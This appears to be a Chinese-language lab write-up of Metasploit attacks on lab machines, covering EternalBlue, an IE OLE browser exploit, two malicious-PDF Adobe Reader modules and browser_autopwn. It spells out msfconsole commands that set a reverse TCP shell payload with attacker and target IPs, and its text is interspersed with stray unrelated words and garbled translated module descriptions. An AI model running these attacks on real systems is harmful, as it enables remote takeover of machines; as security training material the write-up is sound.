主動攻擊:ms17_010_eternalblue
(成功)程序員
ms10_042_helpctr_xss_cmd_exec
(失敗)ms4_064_ole_code_execution
(成功)web
adobe_toolbutton
(成功且惟一)adobe_pdf_embedded_exe
(成功)shell
成功應用任何一個輔助模塊:browser_autopwn
(成功且惟一)windows
ms17_010_eternalblue
進行主動攻擊(靶機:Windows Server 2008 R2 (x64) )首先進入msf的模塊目錄下,查看可用的exploit
瀏覽器
use exploit/windows/smb/ms17_010_eternalblue.rb //使用該模塊 show payloads //查看載荷 set payload generic/shell_reverse_tcp //使用tcp反彈鏈接 set LHOST 192.168.245.132 //設置攻擊機的IP,即KALI的IP地址 set LPORT 5227 //設置攻擊端口 set RHOST 192.168.245.134 //設置靶機IP set target 0 //選擇自動目標系統類型
exploit
進行監聽攻擊ms14_064_ole_code_execution
進行瀏覽器攻擊(靶機:winXP SP3 IE 8)search
命令查找有關瀏覽器攻擊的漏洞use exploit/windows/browser/ms14_064_ole_code_execution info
查看配置信息
服務器
容許的版本
網絡
描述
xss
描述:此模塊利用Windows OLE自動化陣列漏洞,CVE-2014-6332。已知該漏洞會影響互聯網在Windows 95到Windows 10之間的版本11以前的資源管理器3.0,沒有Windows XP的補丁。然而,這種攻擊只針對因爲PowerShell限制,Windows XP和Windows 7框。默認狀況下,Windows XP支持vbs,所以它用做攻擊向量。在其餘較新的Windows系統上,該漏洞將嘗試改用PowerShell
設置相關信息
tcp
攻擊成功
學習
adobe_toolbutton
進行客戶端攻擊(成功且惟一)search
命令查找到適合攻擊的漏洞use windows/fileformat/adobe_toolbutton info
相關信息
描述
描述:此模塊利用Adobe Reader上的「空閒後使用」條件11.0.二、10.1.6和9.5.4及更高版本。脆弱性在處理toolbutton對象時存在,其中回調可用於提早釋放對象內存。之後使用對象容許在空閒條件下觸發使用。這個模塊已在Adobe Reader 11.0.二、10.0.4上成功測試。
進行相關設置,生成PDF文件
kali攻擊機打開監聽模式
靶機打開PDF文件,攻擊成功,得到權限
adobe_pdf_embedded_exe
進行客戶端攻擊search
命令查找到適合攻擊的漏洞use windows/fileformat/adobe_pdf_embedded_exe info
描述:此模塊利用智能獨立的在版本8.2.4和9.3.4中的glyplets(sing)表處理Adobe閱讀器之前的版本也被認爲是易受攻擊的
生成文件
切換成監聽模式
在靶機中打開PDF文件,攻擊成功
browser_autopwn
輔助模塊(成功且惟一)search auxiliary
查找輔助模塊,找到適合的進行運行use auxiliary/server/browser_autopwn info set SRVHOST 172.30.0.189 set SRVPORT 5227 set LHOST 17.30.0.189 run
相關信息
描述
描述:這個模塊有三個動做。第一個(和默認值)是使用客戶端和服務器端組合的「webserver」對HTTP客戶端進行指紋識別,而後自動利用它們。接下來是「defangeddetection」,它只執行指紋部分。最後,「list」只打印全部利用Web服務器操做將使用的模塊當前匹配和排除選項。還添加了一個「list」命令,與運行action=list相同